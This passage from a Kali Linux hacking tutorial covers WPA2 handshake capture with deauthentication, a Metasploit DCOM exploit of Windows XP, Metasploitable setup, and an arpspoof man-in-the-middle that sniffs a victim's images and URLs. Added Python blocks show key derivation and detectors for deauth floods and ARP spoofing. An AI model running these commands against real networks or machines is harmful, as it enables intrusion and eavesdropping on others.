4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames. As soon as the PTK is obtained it is divided into five separate keys:

PTK (Pairwise Transient Key - 64 bytes)
1. 16 bytes of EAPOL-Key Confirmation Key (KCK) - Used to compute the MIC on WPA EAPOL-Key messages.
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - The AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example, the RSN IE or the GTK).
3. 16 bytes of Temporal Key (TK) - Used to encrypt/decrypt unicast data packets.
4. 8 bytes of Michael MIC Authenticator Tx Key - Used to compute the MIC on unicast data packets transmitted by the AP.
5. 8 bytes of Michael MIC Authenticator Rx Key - Used to compute the MIC on unicast data packets transmitted by the station.

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.

By the way, if you didn't understand much of it then don't worry. There's a reason why people don't search for hacking tutorials on Wikipedia (half the stuff goes above the head).

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one:
1. Wifite (easy and automatic)
2. Airodump-ng (easy but not automatic; you manually have to do what wifite did on its own)

Wifite Methodology

We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options: you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good at creating them. Now if your clients are very far from you, your deauth requests (i.e. "please get off this connection" requests) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kinds of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is the same for the wifite and airodump-ng methods, but wifite does all this crap for you, and in the case of airodump-ng, you'll have to call a brethren (aireplay-ng) to your rescue. Okay, enough theory.
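To make the Wikipedia passage concrete, here is the WPA2-PSK key hierarchy it describes, written as an added example for this page (it is not code from the tutorial or from any tool it uses), following the IEEE 802.11i definitions: the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt (4096 iterations, 32 bytes), and the PTK is the HMAC-SHA1 based PRF-512 over the PMK, both MAC addresses and both nonces, split into the five keys listed above. The passphrase/SSID pair is the published 802.11i test vector; the MAC addresses and nonces are constructed. One precision on the text: in the standard, PBKDF2 is the step that turns the passphrase into the PMK, and the PTK then comes from the PRF shown here.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    This is the expensive step that has to be repeated for every candidate passphrase, which
    is why step 2 of the lesson (cracking) is slow and why a long random passphrase holds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    AA is the AP MAC, SPA the station MAC. The min/max ordering is what lets both sides
    compute the same PTK regardless of which address or nonce they consider "theirs"."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return {
        "KCK": ptk[0:16],      # signs the EAPOL-Key MICs (messages 2-4)
        "KEK": ptk[16:32],     # wraps the GTK carried in message 3
        "TK": ptk[32:48],      # encrypts unicast data
        "MIC_TX": ptk[48:56],  # Michael keys, only used with TKIP
        "MIC_RX": ptk[56:64],
    }


def demo() -> dict:
    """Constructed handshake parameters (not taken from a capture)."""
    pmk = derive_pmk("password", "IEEE")        # IEEE 802.11i Annex H test vector
    ap_mac = bytes.fromhex("020000000a0a")       # constructed, locally administered MACs
    sta_mac = bytes.fromhex("020000000c0c")
    anonce = bytes(range(32))                    # constructed nonces
    snonce = bytes(range(32, 64))
    return {"pmk": pmk, "ptk": derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)}


if __name__ == "__main__":
    d = demo()
    print("PMK:", d["pmk"].hex())
    for name, k in d["ptk"].items():
        print(f"{name:6s} {len(k):2d} bytes  {k.hex()}")
```

Because the SSID is the salt, every passphrase guess has to be recomputed per SSID; a network with a default or very common SSID lets an attacker reuse precomputed PMK tables, while a unique SSID plus a long random passphrase forces the full 4096-round cost per guess.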
Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with WPA-2. Now currently no one is connected to the network. Let's try and see what wifite can do.

root@kali:~# wifite

  (WiFite v2 (r85) banner: automated wireless auditor, designed for Linux)

[+] scanning for wireless devices...
[+] enabling monitor mode on wlan0... done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
     1 me                     1  WPA2   57db  wps
     2 *******               11  WEP    21db  no    client
     3 **************        11  WEP    21db  no

Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack. (The network has WPS enabled. This is an added bonus; reaver can save you from all the trouble. Also, wifite will use reaver too, to skip the whole WPA cracking process and use a WPS flaw instead. In this tutorial we'll forget that this network has WPS and capture the handshake instead.)

[+] select target numbers (1-3) separated by commas, or 'all':

Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressed ctrl+c. No client was there, so no handshake could be captured. Here's what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C[0:00:24] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake... (^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done
[+] quitting

Now I connected my other PC to 'me'. Let's do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Let's see what happens this time around.

   NUM ESSID  CH  ENCR  POWER  WPS?  CLIENT
   --- -----  --  ----  -----  ----  -------
     1 *       1  WPA    99db  no    client
     2 me      1  WPA2   47db  wps   client
     3 *      11  WEP    22db  no    clients
     4 *      11  WEP    20db  no

[+] select target numbers (1-4) separated by commas, or 'all': 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C[0:00:07] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:51] listening for handshake... (^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting

Now the deauth attacks weren't working. This time I increased the deauth frequency.

root@kali:~# wifite -wpadt 1

Soon, however, I realized that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene.

root@kali:~# wifite

  (WiFite v2 (r85) banner)

[+] scanning for wireless devices...
[+] available wireless devices:
  1. wlan1  Ralink RT2870/3070  rt2800usb - [phy1]
  2. wlan0  Atheros             ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):

See, we can use the USB card now.
This will solve the problems for us. Now look at the wifite output:

   NUM ESSID  CH  ENCR  POWER  WPS?  CLIENT
   --- -----  --  ----  -----  ----  ------
     1 me      1  WPA2   44db  wps   client
     2 *      11  WEP    16db  no    client
     3 *      11  WEP    16db  no

[+] select target numbers (1-3) separated by commas, or 'all':

Now I attack the target. This time, finally, I captured a handshake.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C[0:00:01] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:07:23] listening for handshake...
[0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap"
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
    me (02:73:8D:37:A7:ED) handshake captured
    saved as hs/me_02-73-8D-**-**-**.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0... done
[+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent; one every 10 secs is the default). The "no dictionary" error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting to .hccap), etc., using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride; all the problems were seen in the wifite case.

Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text.)

1. Find out the name of your wireless adapter.
Alright, now, your computer has many network adapters, so to scan with one, you need to know its name. So there are basically the following things that you need to know:
lo - loopback. Not important currently.
eth - ethernet.
wlan - This is what we want. Note the suffix associated.

Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up? This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode
Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type:
    airmon-ng start wlan0
Your mon0 interface will be created.

3. Start capturing packets
Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.
    airodump-ng mon0

4. Store the captured packets in a file
This can be achieved by giving some more parameters with the airodump command:
    airodump-ng mon0 --write name_of_file

Non newbies:
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

Now copy the bssid field of your target network (from the airodump-ng screen) and launch a deauth attack with aireplay-ng:
root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth tells aireplay to launch a deauth attack. 0 tells it to fire at an interval of 0 secs (very fast, so run it only for a few secs and press ctrl+c). -a requires the BSSID; replace "BSSID here" with your target BSSID. mon0 is the interface you created.

In case you face problems with monitor mode hopping from one channel to another, or problems with the beacon frame, then fix mon0 on a channel using:
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is.
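The deauthentication step above, seen from the other side. This is an added example for this page (not code from the tutorial or from the aircrack-ng suite) that parses 802.11 management frames in Python to do two checks a defender or a wireless IDS would do: count deauthentication frames per BSSID in a sliding window to flag a deauth flood of the kind aireplay-ng --deauth 0 produces, and inspect a beacon's information elements to report whether the AP advertises WPS, which is the check wash performs in the Reaver section earlier and is just as useful for auditing your own AP. Every frame is constructed inside the block; the MAC addresses, the window/threshold values and the abbreviated RSN element are assumptions of the example.

```python
from collections import defaultdict
from typing import Dict, Iterable, Tuple

MGMT = 0                                    # frame type 0 = management
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12
IE_SSID, IE_RSN, IE_VENDOR = 0, 48, 221
WPS_OUI_TYPE = bytes.fromhex("0050f204")    # vendor-specific IE: OUI 00:50:F2, type 4 = WPS


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt(raw: bytes) -> dict:
    """Split an 802.11 management frame into its 24-byte header fields and body."""
    if len(raw) < 24:
        raise ValueError("shorter than an 802.11 management header")
    fc = raw[0]                              # frame control byte 0: version | type | subtype
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "da": fmt_mac(raw[4:10]), "sa": fmt_mac(raw[10:16]),
            "bssid": fmt_mac(raw[16:22]), "body": raw[24:]}


def parse_ies(body: bytes) -> Dict[int, list]:
    """Beacon body: 12 fixed bytes (timestamp, interval, capabilities), then TLV elements."""
    ies = defaultdict(list)
    off = 12
    while off + 2 <= len(body):
        eid, ln = body[off], body[off + 1]
        ies[eid].append(body[off + 2:off + 2 + ln])
        off += 2 + ln
    return ies


def audit_beacon(raw: bytes) -> dict:
    """Report what a beacon advertises: SSID, an RSN (WPA2) element, and a WPS element."""
    f = parse_mgmt(raw)
    if (f["type"], f["subtype"]) != (MGMT, SUBTYPE_BEACON):
        raise ValueError("not a beacon")
    ies = parse_ies(f["body"])
    return {"bssid": f["bssid"],
            "ssid": ies[IE_SSID][0].decode(errors="replace") if ies[IE_SSID] else "",
            "rsn": bool(ies[IE_RSN]),
            "wps": any(v.startswith(WPS_OUI_TYPE) for v in ies[IE_VENDOR])}


def detect_deauth_floods(events: Iterable[Tuple[float, bytes]], window: float = 1.0,
                         threshold: int = 10) -> Dict[str, int]:
    """events = (timestamp, raw frame). Returns {bssid: peak deauth count inside any
    `window` seconds} for every BSSID that reaches `threshold`; other frames are ignored."""
    recent, peaks = defaultdict(list), {}
    for ts, raw in sorted(events, key=lambda e: e[0]):
        f = parse_mgmt(raw)
        if (f["type"], f["subtype"]) != (MGMT, SUBTYPE_DEAUTH):
            continue
        q = recent[f["bssid"]]
        q.append(ts)
        while ts - q[0] > window:            # drop timestamps that fell out of the window
            q.pop(0)
        if len(q) >= threshold:
            peaks[f["bssid"]] = max(peaks.get(f["bssid"], 0), len(q))
    return peaks


# --- constructed frames for the demonstration (not captured traffic) -----------------

def build_mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    fc = bytes([(subtype << 4) | (MGMT << 2), 0])
    return fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body   # duration, addrs, seq ctl


def build_beacon(bssid: bytes, ssid: bytes, wps: bool) -> bytes:
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"       # timestamp, 100 TU interval, ESS+privacy
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    ies += bytes([IE_RSN, 2]) + b"\x01\x00"                # abbreviated RSN element (version only)
    if wps:
        ies += bytes([IE_VENDOR, 4]) + WPS_OUI_TYPE        # WPS element with no attributes
    return build_mgmt(SUBTYPE_BEACON, b"\xff" * 6, bssid, bssid, fixed + ies)


AP_A, AP_B, STA = (bytes.fromhex(h) for h in ("020000000a0a", "020000000b0b", "020000000c0c"))


def sample_events():
    """AP_A receives 20 deauths in one second (a flood); AP_B sees two, 30 s apart (normal)."""
    ev = [(t, build_beacon(AP_A, b"me", wps=True)) for t in (0.0, 0.5)]
    ev += [(i / 20, build_mgmt(SUBTYPE_DEAUTH, STA, AP_A, AP_A, b"\x07\x00")) for i in range(20)]
    ev += [(t, build_mgmt(SUBTYPE_DEAUTH, STA, AP_B, AP_B, b"\x03\x00")) for t in (5.0, 35.0)]
    return ev


if __name__ == "__main__":
    print("deauth floods:", detect_deauth_floods(sample_events()))
    print("beacon audit:", audit_beacon(build_beacon(AP_A, b"me", wps=True)))
```

The mitigation for the deauth-then-capture step is 802.11w (Protected Management Frames): with PMF required, a forged deauthentication frame fails the integrity check and clients ignore it, so the handshake can only be captured when a client genuinely (re)connects. Turning WPS off on the AP removes the Reaver path entirely, and the beacon audit above is a quick way to verify that the setting actually took effect.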
You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng says "fixed channel mon0: -1", so this was required. (It's a bug with the aircrack-ng suite.)

Now when you look at the airodump-ng screen, you'll see that at the top right it says "WPA handshake" captured. Here is what it looks like:

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 *                  *                    0   0e- 1    742        82  me
 *                  *                  -35   0e- 1      0        26

You can confirm it by typing the following:

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.

   #  BSSID              ESSID                     Encryption
   1  **************     me                        WPA (1 handshake)
   2  **                                           Unknown

Happy cracking; all that needs to be done in this tutorial has been done. It's been a long one. Hope it helped you.

Lesson 20: Hacking Windows XP

Penetration Testing - Hacking XP

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going the ideal way. I'm gonna teach you penetration testing the way I learnt it: by doing actual penetration and exploitation. We can't hack a completely patched Windows 7 or Windows 8, right, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need a victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.
Virtual Machines

Windows XP (installing XP on a VM will be a piece of cake; a few screenshots of the process were shown here).

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support."

Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here are some commands you need to execute on your console before you can start metasploit:

    service postgresql start

(Metasploit uses PostgreSQL as its database, so it needs to be launched first.) With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.

    service metasploit start

Now finally we are ready to start the metasploit framework:

    msfconsole

Looking at the targets

Right now, my metasploit framework is running on Kali on VMware on a Windows 8 machine. Also, there is a Windows XP SP3 virtual machine running side by side with my Kali. So what we need to do is detect these machines in the Metasploit framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. To use this feature, enter the following:
    use auxiliary/scanner/portscan/tcp
Type show options to see the available options:
    show options
Now we have to change a few settings. Firstly, we should reduce the number of ports scanned:
    set ports 1-500
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack).
Open the command prompt and type ipconfig. In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as. In my case the IP is 192.168.63.131. Now go back to your Kali machine, and type the following (change the IP as required):
    set RHOST 192.168.63.131
Here's what it should look like (screenshot). There's a slight error here: I spelled RHOSTS wrong. Make sure you add the 's' at the end. Now we are ready for some action; do a show options again to see what all changes you've made. Finally, type:
    run
The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack. If you had not been using an unpatched version of Windows, there would not be any vulnerable ports. This basically means that there are no open ports here. Nothing much you can do. However, if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the Windows machine and ran the auxiliary module again. I got 3 open ports this time. If you are using some higher XP version, you too might need to disable the firewall in order to get open ports. Now we know we have a target at IP 192.168.63.131 and it has ports 135, 139 and 445 open.

Real life port scan

In an actual pentesting environment, you don't know the IP, open ports and OS of the target computer. In such cases, we can use the Nmap port scanner, which is much better than auxiliary. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of the auxiliary scanner. Search for dcom on msfconsole:
    search dcom
This is a very famous exploit for Windows. Copy the exploit number 3 (which shows "great" as rank). In the next line, type:
    use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit.
Type show options again:
    show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target):
    set RHOST 192.168.63.131
Also, set a payload:
    set PAYLOAD windows/shell_bind_tcp
And here's the best part:
    exploit
You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial. We have a pentesting lab now and have successfully exploited an XP machine.

Lesson 21: Metasploitable 2

Metasploitable 2 Linux - Most Vulnerable OS in the town: Introduction and Installation

What is Metasploitable 2

"The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network." [Quoted from Rapid7]

Download and install Metasploitable Linux

Firstly, I'd list some requirements: 10 to 30 GB disk space for Metasploitable (Kali would need a similar amount of disk space), 1 GB RAM for Metasploitable (a total of 4 GB would be great: 1 GB for Kali, 1 GB for Metasploit, and 2 GB will keep your host OS running). If you have all this, which you probably should, then go ahead and download Metasploitable from SourceForge:
    http://sourceforge.net/projects/metasploitable/
The last time I checked, the download was a zip file. After extracting it, no installation is needed. What IS needed is virtual machine software like VMware or VirtualBox.
You can use VirtualBox, which is free, or VMware Workstation, which you'll have to buy; VMware Player is free, and will serve most of your purposes. I am using VMware Workstation, and will give the instructions for it. Detailed guides are available for all of these on the internet, and I won't waste much time with it. Assuming you have downloaded and extracted the Metasploitable file, and installed VMware Workstation, follow these instructions:

Open VMware Workstation. Click on File -> Open. Something like this will pop up (screenshot). After that, browse to the location where you extracted the Metasploitable file. It must look somewhat like this (screenshot). Click on Open. You will see something with a VMware icon. Open that one. Your virtual machine will be up and running within a few minutes. Depending on the situation, a few more "next" and "enter" steps would be required, but the instructions provided by the program would be simple and clear and you can help yourself.

Once you've started Metasploitable, you'll have a login prompt, and the login username and password would be given right there. It would be msfadmin, if you can't seem to find it. Nothing else needs to be done here. Now your target is ready, but you are far from done.

If this is not your first visit to this blog, then you have probably already installed Kali Linux and know how to use it. If you have been following this blog for a long time, then you also know how to use Metasploit to hack a Windows machine, and are ready to jump to the next post. So if you have both OSes, and the basic hacking skills, then you can stop here and move to the next post (coming soon). If not, follow along.

Kali Linux and metasploit

While it's not necessary to use Kali Linux, and Backtrack, Backbox Linux and other Linux distributions will work well too, there is no reason why NOT to use Kali Linux. It simplifies everything for you, providing you with 100s of tools pre-installed, and is specifically designed for pentesting.
It has some advantages over Backtrack; most importantly, it has been written from scratch in Debian and has resolved most of the Backtrack issues. It comes preinstalled with Metasploit, so that takes out one step.

Lesson 22: Man In The Middle Attack

Today our tutorial will talk about the Kali Linux Man in the Middle Attack: how to perform a man in the middle attack using Kali Linux. We will learn the step by step process of how to do this. I believe most of you already know about the concept of what a man in the middle attack is, but if you still don't know about this, here is a definition from Wikipedia:

"The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker."

Victim IP address: 192.168.8.90
Attacker network interface: eth0; with IP address: 192.168.8.93
Router IP address: 192.168.8.8

Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack:
1. Open your terminal (CTRL + ALT + T Kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because to act as the man in the middle attacker, Kali Linux must act as a router between the "real router" and the victim. Read the tutorial here on how to set up packet forwarding in Linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting the Kali Linux terminal window.
3. The next step is setting up arpspoof between victim and router.
    arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. And then setting up arpspoof to capture all packets from router to victim.
    arpspoof -i eth0 192.168.8.8 192.168.8.90
5. After steps three and four, now all the packets sent or received by the victim should be going through the attacker machine.
6. Now we can try to use driftnet to monitor all victim image traffic. According to its website, Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this:
    driftnet -i eth0
When the victim browses a website with images, driftnet will capture all image traffic. To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this:
    urlsnarf -i eth0
and urlsnarf will start capturing all website addresses visited by the victim machine.
9. When the victim browses a website, the attacker will know the address the victim visited.

Lesson 23: Metasploitable 2 - Vulnerability Assessment

Metasploitable 2: Vulnerability assessment and Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.

Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the IP of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan that whole range, you can use an Nmap scan. Here is what it should look like:
    nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine.
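Looking back at steps 3 and 4 of the man in the middle lesson above: the ARP cache poisoning those two arpspoof commands perform is exactly what an ARP monitor on the LAN (arpwatch-style) detects. The following is an added example for this page, not code from the tutorial or from arpspoof, in Python: it parses Ethernet/IPv4 ARP packets, records the first MAC seen for each sender IP (or a static table you supply), and raises an alert when a later ARP packet claims the same IP from a different MAC. The packets are constructed in the block using the lesson's three IP addresses; the MAC addresses are made up for the example.

```python
import struct
from typing import Dict, List, Optional

ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp(pkt: bytes) -> dict:
    """Parse a 28-byte Ethernet/IPv4 ARP packet (the payload that follows the Ethernet header)."""
    hw, proto, hlen, plen, op = struct.unpack("!HHBBH", pkt[:8])
    if (hw, proto, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"op": op,
            "sender_mac": mac_str(pkt[8:14]), "sender_ip": ip_str(pkt[14:18]),
            "target_mac": mac_str(pkt[18:24]), "target_ip": ip_str(pkt[24:28])}


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Inverse of parse_arp; used only to construct the sample capture below."""
    def to_mac(s): return bytes.fromhex(s.replace(":", ""))
    def to_ip(s): return bytes(int(o) for o in s.split("."))
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + to_mac(sender_mac) + to_ip(sender_ip) + to_mac(target_mac) + to_ip(target_ip))


def detect_arp_spoofing(packets: List[bytes], static: Optional[Dict[str, str]] = None) -> List[dict]:
    """Learn IP->MAC from the sender fields of every ARP packet; alert when an IP that is
    already bound (statically, or by first sighting) shows up with a different MAC.
    Limitation: an IP never seen before is learned, not flagged, so static entries for the
    gateway are what make the first spoofed reply visible."""
    table = dict(static or {})
    alerts = []
    for pkt in packets:
        a = parse_arp(pkt)
        bound = table.get(a["sender_ip"])
        if bound is None:
            table[a["sender_ip"]] = a["sender_mac"]
        elif bound != a["sender_mac"]:
            alerts.append({"ip": a["sender_ip"], "expected": bound, "seen": a["sender_mac"],
                           "op": a["op"], "to": a["target_ip"]})
    return alerts


# Addresses from the lesson; MACs are constructed for this example.
ROUTER, VICTIM, ATTACKER = "192.168.8.8", "192.168.8.90", "192.168.8.93"
ROUTER_MAC, VICTIM_MAC, ATTACKER_MAC = "02:00:00:00:00:08", "02:00:00:00:00:90", "02:00:00:00:00:93"


def sample_capture() -> List[bytes]:
    """Constructed sequence: normal ARP exchange, then the two arpspoof directions from the lesson."""
    return [
        build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM, "00:00:00:00:00:00", ROUTER),  # victim asks for router
        build_arp(ARP_REPLY, ROUTER_MAC, ROUTER, VICTIM_MAC, VICTIM),              # genuine answer
        build_arp(ARP_REPLY, ATTACKER_MAC, ROUTER, VICTIM_MAC, VICTIM),            # step 3: router IP, attacker MAC, sent to victim
        build_arp(ARP_REPLY, ATTACKER_MAC, VICTIM, ROUTER_MAC, ROUTER),            # step 4: victim IP, attacker MAC, sent to router
    ]


if __name__ == "__main__":
    for alert in detect_arp_spoofing(sample_capture()):
        print(f"ARP spoof: {alert['ip']} expected {alert['expected']} but seen from {alert['seen']}")
```

The cheap host-side mitigation is a static neighbour entry for the gateway (on Linux, ip neigh replace 192.168.8.8 lladdr <router MAC> dev eth0 nud permanent), which also gives a monitor like the one above a binding to check the very first reply against; on managed switches, Dynamic ARP Inspection performs the same check at the access port. The packet forwarding enabled in step 1 is itself a useful indicator: a workstation with /proc/sys/net/ipv4/ip_forward set to 1 has no business routing, so that setting is worth alerting on in host monitoring.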
On the Metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever it may be in your case).

Vulnerabilities

Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilities. There are the following kinds of vulnerabilities in Metasploitable 2:
1. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
3. Weak Passwords - These are vulnerable to bruteforce attacks.
4. Vulnerable Web Services - A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on the Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

